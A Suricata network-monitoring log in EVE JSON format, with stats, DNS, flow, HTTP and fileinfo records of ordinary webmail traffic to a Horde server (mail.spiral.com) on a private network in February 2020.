{"timestamp":"2020-02-29T00:12:58.000240+0000","event_type":"stats","stats":{"uptime":14430,"capture":{"kernel_packets":135364,"kernel_drops":0},"decoder":{"pkts":135370,"bytes":93299408,"invalid":187,"ipv4":133875,"ipv6":8,"ethernet":135370,"raw":0,"null":0,"sll":0,"tcp":128583,"udp":5090,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2766,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2782,"synack":2773,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1805,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2325,"failed_udp":111},"tx":{"http":4657,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2405}},"flow_mgr":{"closed_pruned":2743,"new_pruned":15,"est_pruned":2370,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22478,"memcap_state":0,"memcap_global":0},"http":{"memuse":58099,"memcap":0}}} 
{"timestamp":"2020-02-29T00:12:59.579081+0000","flow_id":859365721232905,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39736,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43294,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:59.687284+0000","flow_id":859365721232905,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39736,"proto":"UDP","dns":{"type":"answer","id":43294,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:59.687284+0000","flow_id":859365721232905,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39736,"proto":"UDP","dns":{"type":"answer","id":43294,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:59.755268+0000","flow_id":98370530812316,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/deleteEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":200}} {"timestamp":"2020-02-29T00:12:59.755268+0000","flow_id":98370530812316,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/deleteEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":200},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/deleteEvent","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:13:03.000496+0000","flow_id":1012670264431159,"event_type":"flow","src_ip":"192.168.10.122","src_port":58162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:08:02.053815+0000","end":"2020-02-29T00:08:02.162101+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:04.756758+0000","flow_id":98370530812316,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52748,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/deleteEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":200},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/deleteEvent","state":"CLOSED","stored":false,"size":210,"tx_id":0}} 
{"timestamp":"2020-02-29T00:13:05.000299+0000","event_type":"stats","stats":{"uptime":14437,"capture":{"kernel_packets":135371,"kernel_drops":0},"decoder":{"pkts":135379,"bytes":93301537,"invalid":187,"ipv4":133884,"ipv6":8,"ethernet":135379,"raw":0,"null":0,"sll":0,"tcp":128590,"udp":5092,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2767,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2783,"synack":2774,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1806,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2326,"failed_udp":111},"tx":{"http":4658,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2406}},"flow_mgr":{"closed_pruned":2743,"new_pruned":15,"est_pruned":2371,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":1,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22477,"memcap_state":0,"memcap_global":0},"http":{"memuse":58179,"memcap":0}}} 
{"timestamp":"2020-02-29T00:13:07.308166+0000","flow_id":1204526473524166,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46995,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64728,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:07.416966+0000","flow_id":1204526473524166,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46995,"proto":"UDP","dns":{"type":"answer","id":64728,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:07.416966+0000","flow_id":1204526473524166,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46995,"proto":"UDP","dns":{"type":"answer","id":64728,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:07.606223+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7919}} 
{"timestamp":"2020-02-29T00:13:08.000485+0000","flow_id":299443715105269,"event_type":"flow","src_ip":"192.168.10.81","src_port":52730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":9,"bytes_toserver":1312,"bytes_toclient":3258,"start":"2020-02-29T00:11:48.188917+0000","end":"2020-02-29T00:11:58.329407+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:09.000397+0000","flow_id":739926956553289,"event_type":"flow","src_ip":"192.168.10.122","src_port":36865,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:07.963657+0000","end":"2020-02-29T00:08:08.072093+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:09.001174+0000","flow_id":483732157340798,"event_type":"flow","src_ip":"192.168.10.122","src_port":44264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:08:07.957566+0000","end":"2020-02-29T00:08:08.066104+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:10.166487+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52750,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7919},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":44805,"tx_id":0}} {"timestamp":"2020-02-29T00:13:10.177839+0000","flow_id":969226690410159,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37907,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54470,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:10.286032+0000","flow_id":969226690410159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37907,"proto":"UDP","dns":{"type":"answer","id":54470,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:10.286032+0000","flow_id":969226690410159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37907,"proto":"UDP","dns":{"type":"answer","id":54470,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:10.362060+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525}} 
{"timestamp":"2020-02-29T00:13:10.588089+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52750,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36694,"tx_id":1}} {"timestamp":"2020-02-29T00:13:10.603094+0000","flow_id":1108070098154454,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53042,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12091,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:10.711700+0000","flow_id":1108070098154454,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53042,"proto":"UDP","dns":{"type":"answer","id":12091,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:10.711700+0000","flow_id":1108070098154454,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53042,"proto":"UDP","dns":{"type":"answer","id":12091,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:10.769376+0000","flow_id":1491443173997920,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":40263,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:13:10.782469+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957}} {"timestamp":"2020-02-29T00:13:10.782469+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:13:10.877835+0000","flow_id":1491443173997920,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42597,"proto":"UDP","dns":{"type":"answer","id":40263,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:10.877835+0000","flow_id":1491443173997920,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42597,"proto":"UDP","dns":{"type":"answer","id":40263,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:13:11.001346+0000","flow_id":1075243643438853,"event_type":"flow","src_ip":"192.168.10.122","src_port":46096,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:10.657157+0000","end":"2020-02-29T00:08:10.765374+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:11.031139+0000","flow_id":489251210174079,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34814,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7088}} 
{"timestamp":"2020-02-29T00:13:12.000321+0000","event_type":"stats","stats":{"uptime":14444,"capture":{"kernel_packets":135387,"kernel_drops":0},"decoder":{"pkts":135402,"bytes":93311937,"invalid":187,"ipv4":133907,"ipv6":8,"ethernet":135402,"raw":0,"null":0,"sll":0,"tcp":128611,"udp":5094,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2768,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2784,"synack":2775,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1807,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2327,"failed_udp":111},"tx":{"http":4659,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2407}},"flow_mgr":{"closed_pruned":2744,"new_pruned":15,"est_pruned":2373,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22807,"memcap_state":0,"memcap_global":0},"http":{"memuse":125920,"memcap":0}}} 
{"timestamp":"2020-02-29T00:13:12.002010+0000","flow_id":417014135629625,"event_type":"flow","src_ip":"192.168.10.122","src_port":47136,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:11.108345+0000","end":"2020-02-29T00:08:11.216826+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:12.019322+0000","flow_id":1019705441143674,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44779,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64358,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:12.127791+0000","flow_id":1019705441143674,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44779,"proto":"UDP","dns":{"type":"answer","id":64358,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:12.127791+0000","flow_id":1019705441143674,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44779,"proto":"UDP","dns":{"type":"answer","id":64358,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:12.184452+0000","flow_id":700400392481363,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34816,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608}} 
{"timestamp":"2020-02-29T00:13:15.783714+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52750,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2491,"tx_id":2}} {"timestamp":"2020-02-29T00:13:16.036811+0000","flow_id":489251210174079,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34814,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7088},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":38922,"tx_id":0}} {"timestamp":"2020-02-29T00:13:17.187207+0000","flow_id":700400392481363,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34816,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20700,"tx_id":0}} {"timestamp":"2020-02-29T00:13:18.890267+0000","flow_id":36278189856155,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46056,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32443,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:18.998610+0000","flow_id":36278189856155,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46056,"proto":"UDP","dns":{"type":"answer","id":32443,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:18.998610+0000","flow_id":36278189856155,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46056,"proto":"UDP","dns":{"type":"answer","id":32443,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:13:19.000188+0000","event_type":"stats","stats":{"uptime":14451,"capture":{"kernel_packets":135471,"kernel_drops":0},"decoder":{"pkts":135474,"bytes":93343332,"invalid":187,"ipv4":133979,"ipv6":8,"ethernet":135474,"raw":0,"null":0,"sll":0,"tcp":128673,"udp":5104,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099648},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2770,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2786,"synack":2777,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1809,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2331,"failed_udp":112},"tx":{"http":4663,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2411}},"flow_mgr":{"closed_pruned":2744,"new_pruned":15,"est_pruned":2375,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23138,"memcap_state":0,"memcap_global":0},"http":{"memuse":78933,"memcap":0}}} 
{"timestamp":"2020-02-29T00:13:19.093745+0000","flow_id":875772497513137,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409}} {"timestamp":"2020-02-29T00:13:19.093745+0000","flow_id":875772497513137,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:13:21.000327+0000","flow_id":1573653137124388,"event_type":"flow","src_ip":"192.168.10.130","src_port":34804,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1155,"bytes_toclient":5991,"start":"2020-02-29T00:11:40.125988+0000","end":"2020-02-29T00:12:20.586218+0000","age":40,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
